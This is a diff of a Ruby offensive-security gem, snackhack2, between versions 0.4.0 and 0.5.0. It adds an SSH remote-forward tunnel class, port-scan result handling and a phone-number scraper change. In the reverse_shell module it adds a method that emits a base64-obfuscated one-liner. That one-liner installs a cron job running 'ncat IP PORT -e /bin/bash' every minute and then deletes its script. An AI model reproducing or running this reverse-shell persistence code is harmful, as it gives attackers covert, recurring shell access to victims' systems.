snackhack2 0.4.0 → 0.5.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: bbc624381b4958502decfc6b7ac465d6403f1188ce32dab550646e845ccddf12
-  data.tar.gz: 1cc81ff8c7b3de88dfcb61ac2c017399d278d507c5e961ef1de1e217a57210f2
+  metadata.gz: afdc9b9af7107268f1675b7a6551143d6a0548051333bbc6bfdd9509ba849cf5
+  data.tar.gz: ce38033dfa752619fedebfdd0618f85388f62257db1df177a9c0173f29349850
 SHA512:
-  metadata.gz: 74be7753128578579313e14a33b5796262126c3286d6ab77bb345ffd61cf1fb6f0a586e8369ce36a73c0135db99a26b36b73209e67b2d5d2ad59ab758e6035b0
-  data.tar.gz: 490420d11d5a8d93c0d11a3644abfde7ef00ee34621f84074bb82e69e6bea3899646e3c31407b2886d61bfe30b0bbfa12b2f0ade9d88007b18bd703288ed21d9
+  metadata.gz: 1ccafeff7b74f96d7f8d7c1fa4d1b9db2508ba11ae05d26d96ab0f345a961dca5b4de04a2f83dccbfe65223f090cba3aa52d916ec5a4a9cd3564833af79dd6c6
+  data.tar.gz: 2f3e09611dd4d82ba814fd841ee574d3ef493f951b22950ce4957800e568744cf7d5a1b00327673ea2b7037d13410aa0f490d63573654fe6509d0fd87569504f

data/lib/snackhack2/forward_remote.rb

@@ -0,0 +1,23 @@
+require 'net/ssh'
+module Snackhack2
+  class SSHForwardRemote
+    attr_accessor :site, :user, :pass, :key, :lport, :lsite, :rport
+
+    def initialize
+      @site = site
+      @user = user
+      @pass = pass
+      @key  = key
+      @lport = lport
+      @lsite = lsite
+      @rport = rport
+    end
+    def run
+      Net::SSH.start(@site, @user, :password => @pass, :keys => @key) do |ssh|
+        ssh.forward.remote(@lport, @lsite, @rport)
+        puts "[+] Starting SSH remote forward tunnel"
+        ssh.loop { true }
+      end
+    end
+  end
+end

data/lib/snackhack2/phone_number.rb

@@ -18,8 +18,8 @@ module Snackhack2
       http = Snackhack2::get(@site)
       if http.code == 200
         regex = http.body
-        t = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
-        out = t.map { |n| n[0] }.compact
+        phone = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
+        out = phone.map { |n| n[0] }.compact
         numbers << out
       else
         puts "[+] Status code: #{http.code}"

data/lib/snackhack2/portscan.rb

@@ -3,8 +3,11 @@
 require 'packetfu'
 module Snackhack2
   class PortScan
-    def initialize(ip)
+    attr_accessor :display, :ip, :delete
+    def initialize(ip, display: true, delete: false)
       @ip = ip
+      @display = display
+      @delete = delete
     end
 
     def run
@@ -13,8 +16,20 @@ module Snackhack2
       ports.each { |i| threads << Thread.new { tcp(i) } }
       threads.each(&:join)
     end
-
+    def ports_extractor(port)
+      ip=[]
+      files = Dir['*_port_scan.txt']
+      files.each do |f|
+        r=File.read(f)
+        if r.include?(port)
+          ip << f.split("_")[0]
+        end
+      File.delete(f) if delete
+      end
+    File.open("#{port}_scan.txt", 'w+') { |file| file.write(ip.join("\n")) }
+    end
     def tcp(i)
+      ip = @ip
       open_ports = []
       begin
         Timeout.timeout(1) do
@@ -27,10 +42,12 @@ module Snackhack2
       rescue Timeout::Error
       end
       return if open_ports.empty?
-
-      open_ports.each do |port|
-        puts "#{port} is open"
+      if @display
+        open_ports.each do |port|
+          puts "#{port} is open"
+        end
       end
+    File.open("#{ip}_port_scan.txt", 'a') { |file| file.write(open_ports.shift.to_s+ "\n") }
     end
   end
 end

data/lib/snackhack2/reverse_shell.rb

@@ -12,5 +12,11 @@ module Snackhack2
 			(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
       puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
     end
+    def version2
+    	c = %Q{#!/bin/bash
+			line="* * * * * ncat #{@ip} #{@port} -e /bin/bash"
+			(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}	
+    	puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
+    end
   end
 end

data/lib/snackhack2/version.rb

@@ -1,5 +1,5 @@
 # frozen_string_literal: true
 
 module Snackhack2
-  VERSION = '0.4.0'
+  VERSION = '0.5.0'
 end

data/lib/snackhack2.rb

@@ -25,7 +25,7 @@ require_relative 'snackhack2/sitemap'
 require_relative 'snackhack2/tomcat'
 require_relative 'snackhack2/subdomains2'
 require_relative 'snackhack2/reverse_shell'
-
+require_relative 'snackhack2/forward_remote'
 module Snackhack2
   UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
   def self.read_serverversion
@@ -46,14 +46,27 @@ module Snackhack2
       end
     end
   end
-
-  def self.file_save(site, type, content)
-    hostname = URI.parse(site).host
-    File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
-    puts "[+] Saving file to #{hostname}_#{type}.txt..."
+  def self.file_save(site, type, content, ip:false)
+      hostname = URI.parse(site).host
+      File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
+      puts "[+] Saving file to #{hostname}_#{type}.txt..."
   end
 
   def self.get(site)
     HTTParty.get(site, { headers: { "User-Agent" => UA } })
   end
+
+  def self.clean_portscan
+    Dir['*_port_scan.txt'].each do |file|
+      puts "[+] deleting #{file}..."
+      File.delete(file)
+    end
+  end
+  def self.read_portscan
+    files = Dir['*_port_scan.txt']
+    files.each do |f|
+      read = File.read(f)
+      puts "#{f.split('_')[0]}: #{read}"
+    end
+  end
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: snackhack2
 version: !ruby/object:Gem::Version
-  version: 0.4.0
+  version: 0.5.0
 platform: ruby
 authors:
 - mike
 autorequire: 
 bindir: exe
 cert_chain: []
-date: 2024-08-03 00:00:00.000000000 Z
+date: 2024-08-29 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: httparty
@@ -66,6 +66,7 @@ files:
 - lib/snackhack2/cryptoextractor.rb
 - lib/snackhack2/drupal.rb
 - lib/snackhack2/emails.rb
+- lib/snackhack2/forward_remote.rb
 - lib/snackhack2/google_analytics.rb
 - lib/snackhack2/iplookup.rb
 - lib/snackhack2/lists/sshbrute.txt